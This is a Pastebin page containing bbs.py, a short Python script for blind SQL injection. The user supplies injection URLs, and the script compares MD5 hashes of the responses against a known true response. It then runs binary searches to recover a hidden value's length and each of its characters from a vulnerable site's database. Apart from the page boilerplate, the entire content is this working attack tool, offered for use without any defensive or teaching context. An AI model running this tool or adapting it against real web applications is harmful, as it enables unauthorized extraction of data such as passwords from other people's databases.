Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python3
- # bbs.py - Blind SQL Binary Search
- # Author: Laureline David
- import requests
- from hashlib import md5
- from argparse import ArgumentParser
- def url_hash(url):
- resp = requests.get(url)
- data = resp.content
- return md5(data).hexdigest()
- def binary_search(check, max, min=0):
- """
- Performs binary. The ''check'' function must return True if the value is less than the argument
- :param min: Minimum boundary for the search
- :param max: Maximum boundary for the search
- :param check: Check function
- :return: Search Result
- """
- def search_left(min, max):
- delta = max - min
- if delta == 1:
- return min if check(min) else max
- else:
- cur = min + (delta // 2)
- if check(cur):
- # number is less than or equal to cur
- return search_left(min, cur)
- else:
- # number is greater than cur
- return search_left(cur, max)
- if check(max):
- return search_left(min, max)
- else:
- return None
- parser = ArgumentParser(description="Perform blind SQL binary search")
- parser.add_argument('--true-url', dest='true_url')
- subparsers = parser.add_subparsers(dest='mode', help='operation mode')
- length_mode = subparsers.add_parser('length', help='Searches for length')
- length_mode.add_argument('url', help='URL containing the injection that tests for length (1 %parameter)')
- length_mode.add_argument('--max', type=int, default=32)
- chars_mode = subparsers.add_parser('chars', help='Searcher for characters')
- chars_mode.add_argument('url', help='URL containing the injection that tests for character values (2 %parameters)')
- chars_mode.add_argument('length', type=int, help="Length of the string")
- args = parser.parse_args()
- true_hash = url_hash(args.true_url)
- if args.mode == 'length':
- def length_search(n):
- url = args.url % n
- return url_hash(url) == true_hash
- length = binary_search(length_search, max=args.max)
- print(length)
- elif args.mode == 'chars':
- chars = ['?'] * args.length
- for p in range(1, args.length + 1):
- def chars_search(n):
- url = args.url % (p, n)
- return url_hash(url) == true_hash
- chars[p - 1] = binary_search(chars_search, max=128)
- print(str.join("", map(chr, chars)))
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
